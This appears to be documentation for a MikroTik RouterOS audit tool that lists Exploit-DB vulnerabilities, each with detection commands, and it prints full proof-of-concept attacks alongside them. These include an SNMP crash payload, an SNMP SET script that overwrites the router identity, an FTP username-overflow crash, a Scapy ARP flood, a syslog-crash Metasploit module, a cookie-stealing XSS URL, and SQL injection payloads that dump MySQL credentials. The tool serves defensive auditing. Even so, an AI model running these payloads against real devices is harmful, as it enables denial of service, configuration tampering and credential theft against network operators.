All 19 Mikrotik-related Exploit-DB entries plus 81 additional CVE/config-audit exploit classes (100 total database entries, 97 executable exploit classes) are implemented in MikrotikAPI-BF as detection-only PoC classes.
All checks are non-destructive — no crash payloads are sent in automated mode.

# Run full CVE + EDB scan (includes all 100 exploit classes)
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves -U admin -P yourpass

# Run a specific exploit by CVE/EDB ID (v3.10.0+)
python mikrotikapi-bf.py -t 192.168.1.1 --run-exploit CVE-2018-14847

# Run 8-phase audit with SARIF output (v3.10.0+)
python mikrotikapi-bf.py -t 192.168.1.1 --audit -U admin -P yourpass --export sarif

# Run a single EDB exploit class programmatically
python - <<'EOF'
from xpl.exploits import EXPLOIT_REGISTRY
e = EXPLOIT_REGISTRY['EDB-31102']('192.168.1.1', timeout=5)
print(e.check())
EOF

EDB Verified: Yes | Author: ShadOS | Date: 2008-02-04
Affects: RouterOS ≤ 3.2
Type: Hardware / DoS
Protocol: SNMP UDP/161

Description:
A crafted SNMP SET packet sent to RouterOS ≤ 3.2 crashes the SNMPd daemon.
The original C exploit (by ShadOS) uses raw sockets with a spoofed source IP and an SNMP SET BER payload that triggers an out-of-bounds write in the SNMPd.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_31102
e = Exploit_EDB_31102('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (C — original, EDB-31102):

// evilcode[] triggers the crash in RouterOS SNMPd ≤ 3.2
char evilcode[] = {
    0x19,0x02,0x02,0x1e,0x0c,0x02,0x01,0x00,
    0x02,0x01,0x00,0x30,0x0d,0x30,0x0b,0x06,
    0x07,0x01,0x00,0x01,0x00,0x01,0x00,0x00,
    0x05,0x00,0x00
};
// Usage: ./snmpdos -s <source> -d <target> -c <community>

Mitigation: Disable SNMP or upgrade to RouterOS 3.3+.
Reference: https://www.exploit-db.com/exploits/31102

EDB Verified: Yes | Author: ShadOS | Date: 2008-09-05 | CVE-2008-6976
Affects: RouterOS 2.9.51, ≤ 3.13
Type: Hardware / Remote
Protocol: SNMP UDP/161

Description:
MikroTik documented SNMP as read-only (GET/GetNext only), but RouterOS ≤ 3.13 accepts and processes SNMP SET requests — allowing an unauthenticated attacker to overwrite system identity and potentially other OIDs.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_6366
e = Exploit_EDB_6366('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (Python equivalent):

import socket, struct

def snmp_set_identity(target, community="public"):
    # SNMP SET OID 1.3.6.1.2.1.1.5.0 (sysName) = "hacked"
    payload = bytes([
        0x30,0x33, 0x02,0x01,0x00,
        0x04,len(community)] + list(community.encode()) + [
        0xa3,0x18+len(community), 0x02,0x04,0x01,0x02,0x03,0x04,
        0x02,0x01,0x00, 0x02,0x01,0x00,
        0x30,0x16, 0x30,0x14,
        0x06,0x08, 0x2b,0x06,0x01,0x02,0x01,0x01,0x05,0x00,
        0x04,0x06, 0x68,0x61,0x63,0x6b,0x65,0x64  # "hacked"
    ])
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(payload, (target, 161))

Reference: https://www.exploit-db.com/exploits/6366

Author: Lorenzo Santina | Date: 2018-03-12
Affects: RouterOS < 6.38.4 (MIPSBE: EDB-44283, x86/CHR: EDB-44284)
Type: Hardware / Pre-Auth RCE
Protocol: HTTP TCP/80

Description:
The www HTTP service in RouterOS < 6.38.4 is vulnerable to a Stack Clash attack that allows pre-authenticated remote code execution. Two PoCs exist for different CPU architectures.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_44283_44284
e = Exploit_EDB_44283_44284('192.168.1.1', timeout=10)
print(e.check())
EOF

Full PoC: https://github.com/BigNerd95/Chimay-Red

Mitigation: Upgrade to RouterOS 6.38.4+; disable www service if not needed.
References:

• https://www.exploit-db.com/exploits/44283 (MIPSBE)
• https://www.exploit-db.com/exploits/44284 (x86/CHR)

Author: FarazPajohan | Date: 2018-04-13
Affects: RouterOS 6.41.4 FTP service
Type: Hardware / DoS
Protocol: FTP TCP/21

Description:
The FTP daemon in RouterOS 6.41.4 crashes when it receives an excessively long username string during the authentication handshake.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_44450
e = Exploit_EDB_44450('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (Python):

import ftplib
ftp = ftplib.FTP(timeout=5)
ftp.connect('192.168.1.1', 21)
try:
    ftp.login(user='A' * 500, passwd='')  # triggers crash on 6.41.4
except Exception as e:
    print(f"Response: {e}")

Mitigation: Disable FTP service or upgrade to 6.41.5+.
Reference: https://www.exploit-db.com/exploits/44450

Author: FarazPajohan | Date: 2017-12-11
Affects: RouterOS 6.40.5 exactly
Type: Hardware / DoS
Protocol: ICMP

Description:
A crafted ICMP flood causes a DoS condition on RouterOS 6.40.5.

Detection (version check):

python - <<'EOF'
from xpl.exploits import Exploit_EDB_43317
e = Exploit_EDB_43317('192.168.1.1', timeout=5, username='admin', password='pass')
print(e.check())
EOF

Reference: https://www.exploit-db.com/exploits/43317

Author: FarazPajohan | Date: 2017-03-28
Affects: RouterOS 6.38.5
Type: Hardware / DoS

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_41752
e = Exploit_EDB_41752('192.168.1.1', timeout=5, username='admin', password='pass')
print(e.check())
EOF

Reference: https://www.exploit-db.com/exploits/41752

Author: FarazPajohan | Date: 2017-03-05
Affects: Multiple RouterOS versions (L2 attack)
Type: Hardware / DoS
Requirement: Must be on the same Layer-2 segment

Description:
Flooding the router with ARP requests fills the ARP table causing a DoS. Requires L2 adjacency.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_41601
e = Exploit_EDB_41601('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (Scapy — do not run without authorization):

from scapy.all import ARP, Ether, sendp
import random, time

def arp_flood(target_ip, iface="eth0", count=10000):
    """Send ARP requests with random MACs to overflow ARP table."""
    for _ in range(count):
        fake_mac = ":".join(f"{random.randint(0,255):02x}" for _ in range(6))
        pkt = Ether(src=fake_mac, dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=target_ip)
        sendp(pkt, iface=iface, verbose=False)

Mitigation: /ip arp set max-entries=<limit>; implement ARP rate-limiting in firewall.
Reference: https://www.exploit-db.com/exploits/41601

Author: kingcope | Date: 2013-09-03
Affects: RouterOS with ROSSSH SSH daemon (multiple versions)
Type: Hardware / Remote
Protocol: SSH TCP/22

Description:
The MikroTik RouterOS SSH daemon (ROSSSH) is vulnerable to a remote heap corruption bug triggered by sending malformed SSH2_MSG_KEXINIT packets during the key exchange phase.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_28056
e = Exploit_EDB_28056('192.168.1.1', timeout=5)
print(e.check())
EOF

PoC (Python — detection only):

import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(('192.168.1.1', 22))
banner = sock.recv(256).decode(errors='replace')
print(f"SSH Banner: {banner}")
# ROSSSH banners contain "ROSSSH" or "RosSsh"
is_rosssh = 'rosssh' in banner.lower()
print(f"ROSSSH detected: {is_rosssh}")
sock.close()

Reference: https://www.exploit-db.com/exploits/28056

EDB Verified: Yes | Author: xis_one | Date: 2013-04-22
Affects: Mikrotik Syslog Server for Windows v1.15 (MT_Syslog.exe)
Type: Windows Application / DoS
Protocol: Syslog UDP/514
NOTE: This targets the Windows collector application, NOT RouterOS firmware.

Description:
The MT_Syslog.exe v1.15 crashes when it receives a syslog message exceeding its buffer via a WSAEMSGSIZE socket error. An oversized UDP/514 syslog message triggers the condition.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_24968
e = Exploit_EDB_24968('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (Metasploit Ruby — original, EDB-24968):

require 'msf/core'
# Module: auxiliary, includes Msf::Exploit::Remote::Udp, Msf::Auxiliary::Dos
def run
  connect_udp
  pkt = "<0>" + "Apr19 " + "10.0.0.2 " + "badass" + ": " + "A"*5000
  udp_sock.put(pkt)
  disconnect_udp
end

Python equivalent:

import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
pkt = ("<0>Apr19 10.0.0.2 badass: " + "A"*5000).encode()
sock.sendto(pkt, ('192.168.1.1', 514))  # crashes MT_Syslog.exe 1.15

Vulnerable app: https://www.exploit-db.com/apps/2d91984cebb7d4a9b6c156e3062c6843-MT_Syslog.exe
Reference: https://www.exploit-db.com/exploits/24968

Author: PoURaN | Date: 2012-05-01
Affects: Multiple RouterOS versions
Type: Hardware / DoS

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_18817
e = Exploit_EDB_18817('192.168.1.1', timeout=5)
print(e.check())
EOF

Reference: https://www.exploit-db.com/exploits/18817

Author: Prak Sokchea | Date: 2025-07-16
Affects: RouterOS 7.19.1 WebFig web interface
Type: Multiple / Remote / XSS
Protocol: HTTP TCP/80

Description:
The WebFig interface in RouterOS 7.19.1 reflects user-supplied input in error messages without proper HTML encoding, enabling reflected XSS.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_52366
e = Exploit_EDB_52366('192.168.1.1', timeout=5)
print(e.check())
EOF

PoC URL (requires admin to click):

http://<router>/index.html?"><img/src=x onerror=alert(document.cookie)>

Reference: https://www.exploit-db.com/exploits/52366

Author: jul10l1r4 | Date: 2020-05-18
Affects: Mikrotik Router Monitoring System web application v1.2.3 (third-party)
Type: WebApp / SQLi
NOTE: Targets a PHP web application, NOT RouterOS firmware.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_48474
e = Exploit_EDB_48474('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (GET-based):

GET /index.php?community=1+AND+1=0+UNION+SELECT+1,@@version,3,4,5,6--

Reference: https://www.exploit-db.com/exploits/48474

Author: hyp3rlinx | Date: 2016-05-16
Affects: dns_dhcp web interface PHP app (third-party, uses RouterOS API)
Type: PHP WebApp / SQLi
NOTE: Targets a PHP web application frontend, NOT RouterOS firmware.

Description:
The net POST parameter in dns.php is directly concatenated into a MySQL query without sanitization, enabling error-based SQL injection to exfiltrate database credentials.

Detection:

python - <<'EOF'
from xpl.exploits import Exploit_EDB_39817
e = Exploit_EDB_39817('192.168.1.1', timeout=5)
print(e.check())
EOF

Full PoC (PHP curl — original by hyp3rlinx):

curl -X POST http://<target>/dns_dhcp/dns/dns.php \
  -d "net=1 and (select 1 from(select count(*),concat((select (select concat(0x2b,host,0x2b,user,0x2b,password,0x2b)) from mysql.user limit 1),floor(rand(0)*2))x from mysql.user group by x)a)"
# Expected: "Duplicate entry '+root+*HASH+1' for key 'group_key'"

Vulnerable app: https://www.exploit-db.com/apps/7619a886f55b10bb474e7a71c11deee4-dns_dhcp.zip
Reference: https://www.exploit-db.com/exploits/39817

# Full automated scan including all EDB PoC exploit classes
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves -U admin -P yourpassword

# Export results to JSON
python mikrotikapi-bf.py -t 192.168.1.1 --scan-cve --all-cves \
  -U admin -P yourpass --export json --export-dir ./results

# Run all EDB exploits programmatically
from xpl.exploits import EXPLOIT_REGISTRY

target = "192.168.1.1"
edb_ids = [k for k in EXPLOIT_REGISTRY if k.startswith("EDB-")]

for eid in sorted(edb_ids):
    cls = EXPLOIT_REGISTRY[eid]
    result = cls(target, timeout=5, username="admin", password="pass").check()
    status = "VULNERABLE" if result["vulnerable"] else "not vulnerable"
    print(f"[{eid}] {result['title']}: {status}")
    if result.get("evidence"):
        print(f"  Evidence: {result['evidence'][:120]}")

Beyond the 19 EDB entries, MikrotikAPI-BF includes 28 additional exploit/audit classes:

The --audit flag runs an integrated 8-phase security audit covering:

1. System enumeration, 2. Service mapping, 3. Credential audit, 4. Injection testing,
2. Winbox probing, 6. SNMP analysis, 7. Debug endpoints, 8. Firewall audit

All detection classes are read-only by design — they probe for vulnerability indicators without modifying device state or causing crashes.
Use only on systems you own or have explicit written authorization to test.